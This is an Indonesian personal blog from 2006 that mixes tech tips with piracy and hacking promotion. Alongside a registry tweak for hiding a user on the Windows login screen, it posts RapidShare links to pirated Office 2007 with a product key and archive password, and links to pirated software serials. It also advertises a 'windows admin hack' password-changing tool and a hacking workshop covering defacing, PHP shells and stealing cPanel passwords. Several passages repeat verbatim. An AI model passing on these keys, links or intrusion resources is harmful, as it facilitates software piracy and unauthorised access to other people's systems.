Jika anda mengakses situs2 penting (klikbca misalnya) sebaiknya jangan diwarnet . Ini untuk meminimalisasi kemungkinan buruk yang akan terjadi.
Pemasang program "HARAM"
Memasang program2 "haram" adalah sangat "memalukan" mending anda ngemis deh ama yang punya sapa tahu dikasih khan untung loe :P...jangan hanya karena anda men "TO" email, atau nick, atau channel irc lantas anda dengan "bangga" mengatakan "AKU SEORANG HACKER" maka "sambil mengacungkan jari tengah" saya katakan anda LAMERZ... baca dul udech
Artikel2 tentang hacker..
akhirnya.. banyak pekerjaan IT khususnya Internet yang bisa kita dalami. Menjadi seorang "penjahat" bukanlah pekerjaan yang "enak" anda bakalan dimusuhi banyak orang (emang enak)
VIVA dalnet#asiahacker
tulisan ini juga untuk pak kukkuk dalam rangka memperingati satu tahun meninggalnya anak dan istrinya (semoga diterima disisinya aminnnn)
wassalam
Tuesday, December 19, 2006
Menyembunyikan user di menu login
kita kadang ingin sekali keberadaan kita / user account di PC tidak ingin di ketahui oleh orang-orang usil, yang selalu mencoba-coba memasuki wilayah acount kita dengan cara coba-coba password,bagaimana cara menyembunyikan user kita dari proses user switch.
caranya buka start > run > ketik regedit >
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\
CurrentVersion\Winlogon\SpecialAccounts\UserList
buat DWORD Value baru,tulis nama user yang ingin anda hilangkan ( hidden )
maka secara otomatis user account yang anda miliki tidak akan ditampilkan dilayar login, lantas bagaimana cara menampilkannya kembali, anda cukup menekan tombol
ctrl + Alt + del dan ketikan sendiri user + password anda. OKE guest..!
itupun dengan syarat jika ada user yang masih aktif,ctrl + Alt + del tidak mempan,anda harus menonactivekan dulu semua user atau restart komputer anda, jurus ini baru bisa digunakan
selamat mencoba
topengdigital
office 2007 final
http://rapidshare.com/files/7636128/Office2007-EN-FLZTEAM.part6.rar
http://rapidshare.com/files/7521869/Office2007-EN-FLZTEAM.part5.rar
http://rapidshare.com/files/7510427/Office2007-EN-FLZTEAM.part4.rar
http://rapidshare.com/files/7437189/Office2007-EN-FLZTEAM.part3.rar
http://rapidshare.com/files/7394664/Office2007-EN-FLZTEAM.part2.rar
http://rapidshare.com/files/7379997/Office2007-EN-FLZTEAM.part1.rar
Key:
QUOTE
KGFVY-7733B-8WCK9-KTG64-BC7D8
Rar Pass:
QUOTE
www.farkliyiz.com
http://rapidshare.com/files/7521869/Office2007-EN-FLZTEAM.part5.rar
http://rapidshare.com/files/7510427/Office2007-EN-FLZTEAM.part4.rar
http://rapidshare.com/files/7437189/Office2007-EN-FLZTEAM.part3.rar
http://rapidshare.com/files/7394664/Office2007-EN-FLZTEAM.part2.rar
http://rapidshare.com/files/7379997/Office2007-EN-FLZTEAM.part1.rar
Key:
QUOTE
KGFVY-7733B-8WCK9-KTG64-BC7D8
Rar Pass:
QUOTE
www.farkliyiz.com
anti key logger bagi orang yang pobia
anda suka ketik-ketik file atau data pribadi, atau bahkan password email atou passwod e-banking, ternyata tanpa anda sadari semua data-data penting anda terpublikasi atau bahkan dicuri oleh seorang hacker gadungan.
data-data pribadi anda yang sudah anda anggap aman, dengan metode penyimpanan password berlapis, masih juga mampu dijebol dengan hitungan detik itulah ulah si jail dengan menerapkan software keylogger ( yang tidak saya bahas disini sebab sudah saya anggap tidak secanggih tempo dulu di th 2000~2001 )dengan mudahnya si pencopet password tersebut membuka password anda di word/excel atau file zip/rar, yang anda kira memakai software cracking ala elcomsoft. ternyata anda salah besar.
yah tidak selamanya software cracking dipakai untuk mengendus keberadaan password anda, para pencoleng tersebut hanya memakai software keylogger yaitu software perekam gerakan tangan anda di keyboard ( yah..semuanya gerakan jari jemari anda di keyboard, mampu direkam olehnya )
inilah anti pelurunya untuk menghapus software "pengepul" password ( keylogger )
yaitu anti keylogger yang punya nama Elite Anti Keylogger v3.3.3 yang dapat anda download di http://thing.icefile.com/index.php?page=main&id=83e741518
meski saat ini banyak software anti virus juga mampu mendeteksi keylogger ( semacam kaspersky )
data-data pribadi anda yang sudah anda anggap aman, dengan metode penyimpanan password berlapis, masih juga mampu dijebol dengan hitungan detik itulah ulah si jail dengan menerapkan software keylogger ( yang tidak saya bahas disini sebab sudah saya anggap tidak secanggih tempo dulu di th 2000~2001 )dengan mudahnya si pencopet password tersebut membuka password anda di word/excel atau file zip/rar, yang anda kira memakai software cracking ala elcomsoft. ternyata anda salah besar.
yah tidak selamanya software cracking dipakai untuk mengendus keberadaan password anda, para pencoleng tersebut hanya memakai software keylogger yaitu software perekam gerakan tangan anda di keyboard ( yah..semuanya gerakan jari jemari anda di keyboard, mampu direkam olehnya )
inilah anti pelurunya untuk menghapus software "pengepul" password ( keylogger )
yaitu anti keylogger yang punya nama Elite Anti Keylogger v3.3.3 yang dapat anda download di http://thing.icefile.com/index.php?page=main&id=83e741518
meski saat ini banyak software anti virus juga mampu mendeteksi keylogger ( semacam kaspersky )
bagi yang suka gabung video
http://rapidshare.com/files/5766524/Zealot_All_Video_Joiner_v3.3.rar
RAR Pass: qwerty
bagi anda yang seneng menggabung gabung file video anda bisa coba software ini selain mudah cara pemakainya juga ada beberapa fitur menarik lainnya silakan download sepuasnya
Thursday, December 14, 2006
Tuesday, December 12, 2006
Buku baru tentang HACKING
bagi rekan-rekan yang menginginkan buku baru tentang hacking,bisa pesan langsung via e-mail ke jasakom atau jika ingin kolective bisa hubungi saya lewat (isi comment catat email )
namun kayaknya terbitnya bulan januari
bisa anda kunjungi situs
http://www.jasakom.com/penerbitan/
cara isi commentar
klik comment > isi commentar anda > centang pake annonymous > publish your comment
Sunday, December 10, 2006
software
download system mechanic
http://rapidshare.com/files/6791882/SM7Pro.rar
http://rapidshare.com/files/6846381/SMPro7_serials.txt.html
winrar
http://rapidshare.com/files/6496344/wrar362ce.exe
virtual pool
http://rapidshare.de/files/32858441/Virtual_Pool_3.rar
http://rapidshare.com/files/6791882/SM7Pro.rar
http://rapidshare.com/files/6846381/SMPro7_serials.txt.html
winrar
http://rapidshare.com/files/6496344/wrar362ce.exe
virtual pool
http://rapidshare.de/files/32858441/Virtual_Pool_3.rar
yang ingin ikut demo hacking
- Yogyafree mengadakan demo hacking tutor II
- Lokasi
Yogyakarta
- Materi
1.target google
2.injection PHP
3.linux command [basic]
4.defacing
5.bot PHP
6.BOT Netgate
7.Psy Bnc
8.Proxy
9.socks
10.binditty
11.ambil pass cpanel
12.php shell
- Kontribusi
+ Rp.85.000,-
- Pendaftaran
+ Daftar dan bayar dengan redaksi saat demo akan berlangsung
PENTING! : Semua yang daftar harus mengirimkan biodata ke yk_family_code@yahoo.com
- Biodata yang harus di kirim ke e-mail yk_family_code@yahoo,com (Wajib utk semua peserta) :
+ Nick
+ Nama
+ ASL
+ No HP
+ E-mail
+ Kota
- Bonus
+ 1 CD Yogyafree Express 2.0 / 2.x
+ 1 Ayam Goreng + Nasi + Es teh
- Pelaksanaan
+ Tempat dirahasiakan (hanya diberitahukan lewat e-mail)
+ Waktu dirahasiakan (hanya diberitahukan lewat e-mail)
+ Kami tidak menerima komplain harinya tidak sesuai karena dengan anda mengirimkan mendaftar
maka anda harus siap harinya.
+ Jika misal internet saat demo matot maka otomatis akan diganti harinya
+ Demo terbagi 2 sesi, pagi - sore (6 org pertama), sore - malam (6 orang berikutnya)
- Peserta Max 12 orang dibagi 2 sesi
- Paling lambat pendaftaran tanggal 9 Desember 2006 melalui e-mail dan uang dibayar saat akan demo
- Demo hacking ini hanya untuk kalangan sendiri, tidak di sebar ke media lain selain media
Yogyafree sendiri.
- Materi dpt berubah sewaktu-waktu
Informasi ini dpt berubah2 sewaktu2, ikuti terus perkembangannya.
- Lokasi
Yogyakarta
- Materi
1.target google
2.injection PHP
3.linux command [basic]
4.defacing
5.bot PHP
6.BOT Netgate
7.Psy Bnc
8.Proxy
9.socks
10.binditty
11.ambil pass cpanel
12.php shell
- Kontribusi
+ Rp.85.000,-
- Pendaftaran
+ Daftar dan bayar dengan redaksi saat demo akan berlangsung
PENTING! : Semua yang daftar harus mengirimkan biodata ke yk_family_code@yahoo.com
- Biodata yang harus di kirim ke e-mail yk_family_code@yahoo,com (Wajib utk semua peserta) :
+ Nick
+ Nama
+ ASL
+ No HP
+ Kota
- Bonus
+ 1 CD Yogyafree Express 2.0 / 2.x
+ 1 Ayam Goreng + Nasi + Es teh
- Pelaksanaan
+ Tempat dirahasiakan (hanya diberitahukan lewat e-mail)
+ Waktu dirahasiakan (hanya diberitahukan lewat e-mail)
+ Kami tidak menerima komplain harinya tidak sesuai karena dengan anda mengirimkan mendaftar
maka anda harus siap harinya.
+ Jika misal internet saat demo matot maka otomatis akan diganti harinya
+ Demo terbagi 2 sesi, pagi - sore (6 org pertama), sore - malam (6 orang berikutnya)
- Peserta Max 12 orang dibagi 2 sesi
- Paling lambat pendaftaran tanggal 9 Desember 2006 melalui e-mail dan uang dibayar saat akan demo
- Demo hacking ini hanya untuk kalangan sendiri, tidak di sebar ke media lain selain media
Yogyafree sendiri.
- Materi dpt berubah sewaktu-waktu
Informasi ini dpt berubah2 sewaktu2, ikuti terus perkembangannya.
windows admin hack
anda bisa merubah user ato password tanpa melewati control panel, namun belum aku coba bekerja nggak di limited ( perasaan ndak bisa kerja dilimited download di http://depositfiles.com/en/files/435936
Thursday, December 07, 2006
K. O
aku ngepost ini di PCrumah, biasa lagi absen, karena istirahat sakit,baru aja opname 5 hari (di RS p****)jadi belum bisa ngisi blog ini dengan berbagai artikel menarik.
lagi kena sakit capek..
besok kalo udah sembuh tak posting yang lebih siip..!
lagi kena sakit capek..
besok kalo udah sembuh tak posting yang lebih siip..!
Subscribe to:
Posts (Atom)
